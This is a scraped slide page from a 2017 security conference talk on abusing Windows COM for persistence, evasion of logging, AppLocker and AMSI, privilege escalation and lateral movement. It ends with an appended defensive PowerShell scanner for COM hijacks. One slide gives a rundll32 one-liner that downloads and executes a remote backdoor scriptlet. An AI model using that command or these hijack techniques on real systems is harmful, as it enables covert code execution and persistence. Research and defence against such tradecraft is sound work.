Submitted URL: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
Effective URL: https://de.slideshare.net/enigma0x3/windows-operating-system-archaeology
Submission: On November 18 via api from US — Scanned from DE
WINDOWS OPERATING SYSTEM ARCHAEOLOGY
22 Apr 2017 · 15 likes · 13,988 views · 183 downloads · 47 slides
By enigma0x3

Given at BSides Nashville 2017. The modern Windows Operating System carries with it an incredible amount of legacy code. The Component Object Model (COM) has left a lasting impact on Windows. This technology is far from dead, as it continues to be the foundation for many aspects of the Windows Operating System. You can find hundreds of COM classes defined by CLSID (COM Class Identifiers). Do you know what they do? This talk seeks to expose tactics long forgotten by the modern defender. We seek to bring to light artifacts in the Windows OS that can be used for persistence. We will present novel tactics for persistence using only the registry and COM objects.
Build Features, Not Apps von natashatherobot Build Features, Not Apps Natasha Murashev 389.6K aufrufe•60 Folien Presented at Tokyo iOS Meetup https://www.meetup.com/TokyoiOSMeetup/events/234405194/ Video here: https://www.youtube.com/watch?v=lJlyR8chDwo The State of Decentralized Storage von coingecko The State of Decentralized Storage CoinGecko•48.3K aufrufe Platform Strategy & Ecosystems von apigee Platform Strategy & Ecosystems Apigee | Google Cloud•18.6K aufrufe chatgpt dalle.pptx von wolfmap chatgpt dalle.pptx Ellen Edmands•5.7K aufrufe The AI Rush von jeanbaptiste.dumont The AI Rush Jean-Baptiste Dumont•1.1M aufrufe Network Effects von a16z Network Effects a16z•777.5K aufrufe Solve for X with AI: a VC view of the Machine Learning & AI landscape von edslide Solve for X with AI: a VC view of the Machine Learning & AI landscape Ed Fernandez•409.5K aufrufe Mobile Is Eating the World (2016) von a16z Mobile Is Eating the World (2016) a16z•1.7M aufrufe Build Features, Not Apps von natashatherobot Build Features, Not Apps Natasha Murashev•389.6K aufrufe KÜRZLICH HOCHGELADEN (20) Reshaping the landscape of belonging to transform community von AllThingsOpen Reshaping the landscape of belonging to transform community All Things Open 20 aufrufe•21 Folien Presented at All Things Open 2024 Presented by Winstina Hughes - Support Inclusion in Tech Title: Reshaping the landscape of belonging to transform community Abstract: The years leading up to being a Fellow on President Barack Obama’s 2012 campaign honed my advocacy skills, teaching me to speak up for myself and my community. Within the WordPress community, I found both refuge and purpose, learning the power of collaboration and global connection. These experiences, like threads woven together, prepared me for an audacious achievement: sending underrepresented speakers from five continents to WordCamps through strategic partnerships. 
This initiative isn't just about sending speakers; it is about sharing diverse voices, expanding perspectives on leadership, and weaving a more vibrant, interconnected thread throughout the WordPress ecosystem and tech. Join me as I share tools for change that transformed my fear of outsider status into an innovative solution for global connection and inclusivity. This talk is for anyone who has ever felt like they didn't quite belong, whether in an open source conference, slack channel, or within their own skin. By the end of this talk you will have insight on how to reshape belonging in your community to help any member find their true voice even while hiding from it. Find more info about All Things Open: On the web: https://www.allthingsopen.org/ Twitter: https://twitter.com/AllThingsOpen LinkedIn: https://www.linkedin.com/company/all-things-open/ Instagram: https://www.instagram.com/allthingsopen/ Facebook: https://www.facebook.com/AllThingsOpen Mastodon: https://mastodon.social/@allthingsopen Threads: https://www.threads.net/@allthingsopen 2024 conference: https://2024.allthingsopen.org/ ATI PHARMACOLOGY PROCTORED EXAM 20232024.pdf von faithlachero13 ATI PHARMACOLOGY PROCTORED EXAM 20232024.pdf faithlachero13 117 aufrufe•36 Folien ATI PHARMACOLOGY PROCTORED EXAM 20232024.pdfATI PHARMACOLOGY PROCTORED EXAM 20232024.pdfATI PHARMACOLOGY PROCTORED EXAM 20232024.pdf Character Generation Master 角色生成大師【艾鍗學院】 von IttrainingIttraining Character Generation Master 角色生成大師【艾鍗學院】 IttrainingIttraining 126 aufrufe•98 Folien 艾鍗學院學員專題 - Character Generation Master 角色生成大師 Leader: Mei Member: Emily, Steven, Zero 專題網頁:https://bit.ly/409aXVK 艾鍗官網:https://bit.ly/3ESwHdW 聯絡信箱:service@ittraining.com.tw <專題摘要> 我們開發了一套名為「角色生成大師」的軟體,它是一款融合 AI 技術的角色創作工具,旨在透過 Stable Diffusion 模型的圖像生成能力與 Gemini 大模型的故事生成功能,協助使用者輕鬆創作角色。Stable Diffusion 採用擴散式生成模型,能快速生成高解析度、風格多樣且細節豐富的圖像,而 Gemini 大模型則依賴深度學習技術,提供創意性高且語義一致的故事生成功能。使用者只需透過直觀的Tkinter 
介面設定角色特徵,如年齡、體型、髮型等,即可自動生成與想像匹配的角色圖像和背景故事。這款工具不僅適合遊戲開發者和小說家,也適用於任何對角色設計有興趣的創作者,為他們提供便利且強大的創作支持。 Intro to Backend Development - GDG on Campus EUE von euegdgoncampus Intro to Backend Development - GDG on Campus EUE Google Developer Group On Campus European Universities in Egypt 18 aufrufe•12 Folien What You'll Learn: - Types of programming languages and how they’re used - The difference between backend and frontend development - Understanding servers and databases - Static vs. dynamic websites A live example of a backend server in action! Understanding How Search Works November 7 2024.pptx von accessinnovations Understanding How Search Works November 7 2024.pptx Access Innovations, Inc. 84 aufrufe•57 Folien With the launches of various LLMs and GPTs over the past two years, we have learned that the size of the collection matters and things we only dreamed of, have become a reality. In the meantime, we have leapfrogged over some of the WHAT about search and the basics that underlie HOW search works haven’t changed since the early 1970s! Understanding How Search Works enables you to make better use what you have in place now and how to implement those much-hyped Gen AI platforms. Join Marjorie M. K. Hlava, Founder and Chief Science Officer at Access Innovations, Inc. for an insightful webinar that will open your eyes and help you make informed decisions about which steps to take next – without a Computer Science degree! BUILD WITH AI GDG on Campus PEC Tiruvallur. von HARISHK755873 BUILD WITH AI GDG on Campus PEC Tiruvallur. 
HARISHK755873 143 aufrufe•16 Folien Hands on Session STIG 101 with MITRE & Anchore: Insights for Compliance & Cyber Readiness von marketing814989 STIG 101 with MITRE & Anchore: Insights for Compliance & Cyber Readiness Anchore 68 aufrufe•17 Folien The latest FedRAMP revision 5 designates STIGs as the official standard for hardening operating systems and applications that operate inside FedRAMP boundaries, making STIGS the default tool for system integrators, government contractors, and independent software vendors. With this renewed interest in STIGs, it’s a great opportunity to learn STIG terminology and uses. MITRE has been leading the way in modernizing the creation and consumption of STIG guidance for many years now. This includes a tool, Vulcan, to simplify the creation and maintenance of STIG security guidance. In our upcoming live webinar, Aaron Lippold, Chief Architect of MITRE Security Automation Framework (SAF) at MITRE, and Josh Bressers, VP of Security at Anchore, will discuss the rising importance of STIGs. Josh and Aaron will explain how STIGs are used in modern environments, and how you can leverage the new tooling to automate compliance. They will explain and demonstrate how practitioners and security professionals can approach STIG compliance to ensure project success. 
Attendees will come away with an understanding of: - What is a STIG guide and how to use it - How to approach STIG compliance - Why continuous cyber readiness is critical in today’s landscape - The benefits of real time visibility within the SDLC - How Anchore Enterprise supports STIG compliance ThousandEyes and Webex Assure Seamless Collaboration for Insight Global von ThousandEyes ThousandEyes and Webex Assure Seamless Collaboration for Insight Global ThousandEyes 79 aufrufe•17 Folien Presented by Brian Tobia, Chris Cavendish, and Suzanne Phillips Reshaping the landscape of belonging to transform community von AllThingsOpen Reshaping the landscape of belonging to transform community All Things Open•20 aufrufe ATI PHARMACOLOGY PROCTORED EXAM 20232024.pdf von faithlachero13 ATI PHARMACOLOGY PROCTORED EXAM 20232024.pdf faithlachero13•117 aufrufe Character Generation Master 角色生成大師【艾鍗學院】 von IttrainingIttraining Character Generation Master 角色生成大師【艾鍗學院】 IttrainingIttraining•126 aufrufe Intro to Backend Development - GDG on Campus EUE von euegdgoncampus Intro to Backend Development - GDG on Campus EUE Google Developer Group On Campus European Universities in Egypt•18 aufrufe Understanding How Search Works November 7 2024.pptx von accessinnovations Understanding How Search Works November 7 2024.pptx Access Innovations, Inc. •84 aufrufe BUILD WITH AI GDG on Campus PEC Tiruvallur. von HARISHK755873 BUILD WITH AI GDG on Campus PEC Tiruvallur. 
HARISHK755873•143 aufrufe STIG 101 with MITRE & Anchore: Insights for Compliance & Cyber Readiness von marketing814989 STIG 101 with MITRE & Anchore: Insights for Compliance & Cyber Readiness Anchore •68 aufrufe ThousandEyes and Webex Assure Seamless Collaboration for Insight Global von ThousandEyes ThousandEyes and Webex Assure Seamless Collaboration for Insight Global ThousandEyes•79 aufrufe GERELATEERDE BOEKEN Kostenlos mit einem 30-tägigen Test von EverandAlle anzeigen BoekThe 1 Page Python BookBarani Kumar ★★☆☆☆2 / 5 BoekThe Windows Command Line Beginner's Guide: Second EditionJonathan Moeller ★★★☆☆3 / 5 BoekPowerShell: A Comprehensive Guide to Windows PowerShellSam Griffin ★★★☆☆3 / 5 BoekUltimate Hacking Challenge: Hacking the Planet, #3sparc Flow ★★★★★5 / 5 BoekC# for Beginners: Learn in 24 HoursAlex Nordeen ☆☆☆☆☆0 / 5 BoekPython Advanced Programming: The Guide to Learn Python Programming. Reference with Exercises and Samples About Dynamical Programming, Multithreading, Multiprocessing, Debugging, Testing and MoreMarcus Richards ☆☆☆☆☆0 / 5 BoekFootprinting, Reconnaissance, Scanning and Enumeration Techniques of Computer NetworksDr. Hidaia Mahmood Alassouli ☆☆☆☆☆0 / 5 BoekBasics with Windows PowershellPrometheus MMS ☆☆☆☆☆0 / 5 GERELATEERDE LUISTERBOEKEN Kostenlos mit einem 30-tägigen Test von EverandAlle anzeigen LuisterboekLinuxRyan Turner ★★★★☆4 / 5 LuisterboekThe Ultimate Kali Linux Book - Second Edition: Perform advanced penetration testing using Nmap, Metasploit, Aircrack-ng, and EmpireGlen D. Singh ★★★★★5 / 5 LuisterboekLearn Python: A Crash Course On Python Programming and How To Start Coding With It. 
WINDOWS OPERATING SYSTEM ARCHAEOLOGY
* 1. Windows Operating System Archaeology - Matt Nelson, Casey Smith
* 2. Who Are We? - Casey Smith (@subTee) - Mandiant Red Team - subt0x10.blogspot.com - Matt Nelson (@enigma0x3) - Operator and Security Researcher at SpecterOps - enigma0x3.net
* 3. Objectives For This Talk: Foster curiosity & further research. Provide references. Call attention to the attack surface and capabilities.
* 4. What Will We Discuss? COM Overview. COM Research Methodology. Malicious COM Tactics.
* 5. COM Overview - Brief Background - Registration - Resolution
* 6. COM Architecture and History - in 2 minutes ;-) What are COM components? COM components are cross-language classes backed by: DLL (Dynamic-Link Libraries), OCX (ActiveX controls), TLB (Type Libraries), EXE (Executables), SCT (XML files). Location Transparency Principle.
* 7. Example - COM Scriptlet XML. XML files - we use these for POC examples. Registration Block.
* 8. COM Object Type Registration. To find a component when a program needs it, it is USUALLY registered. What registry keys are related to COM object registration? HKLM + HKCU; HKCR.
* 9. What registry entries are needed to register a COM object?
https://blogs.msdn.microsoft.com/larryosterman/2006/01/11/what-registry-entries-are-needed-to-register-a-com-object/ Also XRef: Minimal COM object registration https://blogs.msdn.microsoft.com/larryosterman/2006/01/05/minimal-com-object-registration/
* 10. COM Object Type Resolution. CLSID - GUID - {AAAA1111-0000-0000-0000-0000FEEDACDC}. ProgID - String. Monikers - "scriptlet:http://example.com/file.sct". GetObject / CreateObject methods. rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";a=GetObject('scriptlet:https://example.com/Backdoor.sct');a.Exec();close();
* 11. WMI GetObject example
* 12. Registry Example
* 13. COM Registry Keys https://msdn.microsoft.com/en-us/library/windows/desktop/ms678477(v=vs.85).aspx Regsvr32.exe, Regasm.exe, Regsvcs.exe. These tools usually handle the registration and registry key population for us.
* 14. Example Call To Create/Locate an Object
* 15. What does all this mean? COM artifacts and details can be found in the registry. Usually...
* 16. Avoid Registration Process
* 17. Sample Objective: Execute .NET code inside Windows Scripting Host without registering the COM object.
* 18. Registration-Free COM Activation. Microsoft.Windows.ActCtx object. Attach a Manifest or download ManifestURL. Loads a DLL without registration. https://github.com/subTee/RegistrationFreeCOM
* 20. RegistrationHelper - Bypass via CScript.exe https://gist.github.com/subTee/631f859c7890316b7e9a880cf4a51500
* 21. Example https://gist.github.com/subTee/631f859c7890316b7e9a880cf4a51500
* 22. In Memory Assembly Execution JScript/VBScript https://github.com/tyranid/DotNetToJScript This is amazing! Executes a .NET assembly IN JSCRIPT. This dramatically extends the capabilities of COM Scriptlets. No DLL on disk. Works for .NET 2 and 3.5 only.
* 24. Methodology Examples: Using Procmon to trace resolution
* 25. Example - There are DOZENS of these
* 26.
Excavation Tools: James Forshaw - OleViewDotNet - https://github.com/tyranid/oleviewdotnet; Mark Russinovich - ProcMon - https://technet.microsoft.com/en-us/sysinternals/processmonitor; RPCView - http://rpcview.org; API Spy - http://www.rohitab.com/apimonitor
* 27. Malicious Tactics Overview: Persistence; COM Hijacking - Evasion; Office Add-Ins; Privilege Escalation; Lateral Movement
* 28. Persistence via COM Hijacking. Leveraging per-user COM objects, we can divert resolution to an object under our control. Registry-only persistence. "TreatAs" hijack. COM handler hijacking (scheduled tasks). https://msdn.microsoft.com/en-us/library/windows/desktop/ms679737(v=vs.85).aspx https://github.com/subTee/OSArchaeology/blob/master/COM/TreatAsPersistence.reg https://enigma0x3.net/2016/05/25/userland-persistence-with-scheduled-tasks-and-com-handler-hijacking/
* 29. Persistence via COM Hijacking
* 30. DEMO: Registry Only Persistence
* 31. Evasion. Windows very often resolves COM objects via the HKCU hive first. Find your favorite script that implements GetObject() or CreateObject() and hijack it. This allows you to instantiate your own code without exposing it via the command line.
* 32. Abusing WSH: VBScript Injection. Leverage an existing, signed VBScript to run our code.
* 33. C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs. For example: the Windows printing script pubprn.vbs calls GetObject on a parameter we control. Can use this to execute a COM scriptlet.
* 34. Example: Evade Command Line Logging. slmgr.vbs instantiates Scripting.Dictionary via CreateObject(). Hijack that object to make it run your code.
* 35. Source Code of slmgr.vbs - Default System File
* 36. Example: Evade Command Line Logging
* 37. This is also a clever way to bypass AppLocker ;-) Winrm.vbs
* 38. Bypass the AntiMalware Scan Interface (AMSI)
* 39. Malicious Office Add-ins: Outlook, Excel etc.
Rich API for persistence and C2. https://twitter.com/JohnLaTwC/status/836259629277421568 Outlook Rules Added Via COM Object https://gist.github.com/subTee/e04a93260cc69772322502545c2121c4 https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
* 40. Privilege Escalation. The COM Elevation Moniker - Resources - Execute a process in another user's session - think Terminal Server or RDP etc.
* 41. COM - CVE-2017-0100 https://drive.google.com/file/d/0B5sMkPVXQnfPbXI0SVliV0tuU0U/view - James Forshaw
* 42. Domain Admin Elevation http://blog.inspired-sec.com/archive/2017/03/17/COM-Moniker-Privesc.html @n0pe_sled
* 43. Lateral Movement - Leveraging DCOM objects with no explicit access or launch permissions set - Certain objects have interesting methods... https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
* 45. Conclusions
* 46. Hopeful outcomes of this talk: Foster curiosity & further research. Provide references. Call attention to the attack surface and capabilities.
* 47. Closing Thoughts / Conclusions / Thanks. Special thanks to: David McGuire & Jason Frank for their support of this research while we were working for them. James Forshaw - for answering our questions and for his COM research. All of the former ATD members who provided feedback and improvements to our research!
EDITOR'S NOTES
1. Casey
2. Casey/Matt
3. Casey
4. Casey
5. Casey
6. Casey https://cansecwest.com/slides/2015/Smart_COM_Fuzzing_Auditing_IE_Sandbox_Bypass_in_COM_Objects-Xiaoning_li.pdf https://www.blackhat.com/docs/us-14/materials/us-14-Forshaw-Digging-For_IE11-Sandbox-Escapes.pdf COM Specification: http://www.daimi.au.dk/~datpete/COT/COM_SPEC/pdf/com_spec.pdf Windows COM Dependency/History/Origins. James Forshaw's talk at Troopers and Infiltrate
7. Casey - Necessary for GetObject
8. Casey - AppID, CLSID. Explain HKCR vs HKCU/HKLM
9. Casey
10.
Casey https://blogs.msdn.microsoft.com/cristib/2012/10/31/how-com-works-how-to-build-a-com-visible-dll-in-c-net-call-it-from-vba-and-select-the-proper-classinterface-autodispatch-autodual-part12/ Be sure to reference script:http for Matt's malicious demos
11. Casey - Importance of GetObject
12. Casey
13. Casey - From COM Specification
14. Casey
15. Casey
16. Casey
17. Casey
18. Casey (maybe add arrows)
19. Casey
20. Matt - Resolution fails as well
21. Matt (reference TreatAs)
22. Casey/Matt
23. Matt
24. Matt http://www.nobunkum.ru/analytics/en-com-hijacking https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence https://attack.mitre.org/wiki/Technique/T1122
25. Matt
26. Matt
27. Matt
28. Matt
29. Matt - Source code of pubprn.vbs. Injectable args(1)
30. Matt
31. Matt - Point out why that injection is possible. We can hijack the script at CreateObject - before the rest of the logic!
32. Matt
33. Matt
34. Matt
35. Matt
36. Casey https://msdn.microsoft.com/en-us/library/ms679687.aspx - COM Elevation Moniker https://bugs.chromium.org/p/project-zero/issues/detail?id=1021&can=1&q=&sort=-id%20-%20P0%20EoP Reference Julian n0pe_sled's write-up, once posted, on using this trick to get DA. http://blog.inspired-sec.com/archive/2017/03/17/COM-Moniker-Privesc.html
37. Casey https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=262285 http://blog.inspired-sec.com/archive/2017/03/17/COM-Moniker-Privesc.html Windows HelpPane Elevation of Privilege Vulnerability - CVE-2017-0100. An elevation of privilege exists in Windows when a DCOM object in Helppane.exe configured to run as the interactive user fails to properly authenticate the client. An attacker who successfully exploited the vulnerability could run arbitrary code in another user's session. To exploit the vulnerability, an attacker would first have to log on to the system.
An attacker could then run a specially crafted application that could exploit the vulnerability once another user logged in to the same system via Terminal Services or Fast User Switching. The update addresses the vulnerability by correcting how Helppane.exe authenticates the client. The following table contains links to the standard entry for each vulnerability in the Common Vulnerabilities and Exposures list:
Vulnerability title | CVE number | Publicly disclosed | Exploited
Windows HelpPane Elevation of Privilege Vulnerability | CVE-2017-0100 | No | No
38. Casey
39. Matt
40. Matt
41. Matt
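The resolution order on slides 28 and 31 (per-user CLSID entries under HKCU are consulted before the machine-wide ones, and a TreatAs key silently redirects activation to another class) is also the registry footprint a defender hunts for. The PowerShell below is an added example, not code from the talk or from the authors' tooling; it assumes the standard CLSID key locations and that it runs as the user whose hive is being inspected, and the function name Get-ComHijackCandidate is my own.

```powershell
# Added example (not from the talk): report per-user COM class registrations that
# shadow a machine-wide CLSID. HKCU\Software\Classes is merged into HKCR ahead of
# HKLM for the current user, so a CLSID present in both hives, with a server path or
# a TreatAs redirect under HKCU, is the pattern of the hijacks on slides 28 and 31.
# Assumptions: standard CLSID locations; run in the context of the user under review.

function Get-ComHijackCandidate {
    [CmdletBinding()]
    param(
        # Registry roots are parameters only so the scan can be pointed at a loaded hive.
        [string]$UserRoot    = 'HKCU:\Software\Classes\CLSID',
        [string]$MachineRoot = 'HKLM:\Software\Classes\CLSID'
    )

    if (-not (Test-Path -Path $UserRoot)) {
        # No per-user CLSID key at all: nothing can be shadowed for this user.
        return @()
    }

    foreach ($key in Get-ChildItem -Path $UserRoot) {
        $clsid = $key.PSChildName
        $base  = $key.PSPath

        # Default values of the server subkeys that activation resolves first.
        $inproc  = (Get-ItemProperty -Path "$base\InprocServer32" -ErrorAction SilentlyContinue).'(default)'
        $local   = (Get-ItemProperty -Path "$base\LocalServer32"  -ErrorAction SilentlyContinue).'(default)'
        # TreatAs redirects this CLSID to another class (the "TreatAs hijack" on slide 28).
        $treatAs = (Get-ItemProperty -Path "$base\TreatAs" -ErrorAction SilentlyContinue).'(default)'

        # Does the same CLSID exist machine-wide? If so, the HKCU entry overrides it.
        $shadowsMachine = Test-Path -Path (Join-Path -Path $MachineRoot -ChildPath $clsid)

        # Check the in-process server on disk (LocalServer32 often carries arguments,
        # so only the DLL path is checked here). Expanding is harmless if already expanded.
        $serverOnDisk = $null
        if ($inproc) {
            $dll = [Environment]::ExpandEnvironmentVariables($inproc)
            $serverOnDisk = Test-Path -LiteralPath $dll
        }

        # A per-user entry that overrides a machine-wide class is the case to review.
        # Legitimate per-user installs do this too, so it is a lead, not a verdict.
        $priority = 'Low'
        if ($shadowsMachine -and ($inproc -or $local -or $treatAs)) { $priority = 'High' }

        [PSCustomObject]@{
            CLSID          = $clsid
            InprocServer32 = $inproc
            LocalServer32  = $local
            TreatAs        = $treatAs
            ShadowsHKLM    = $shadowsMachine
            ServerOnDisk   = $serverOnDisk
            ReviewPriority = $priority
        }
    }
}

# Example usage: only the entries that override a machine-wide class.
Get-ComHijackCandidate | Where-Object ReviewPriority -eq 'High' | Format-Table -AutoSize
```

Compare each flagged HKCU server path with the corresponding HKLM entry before acting, since per-user application installs register under HKCU legitimately. For continuous coverage rather than a point-in-time scan, Sysmon registry events (ID 12 for key create/delete, ID 13 for value set) scoped to these key paths surface the same change as it happens.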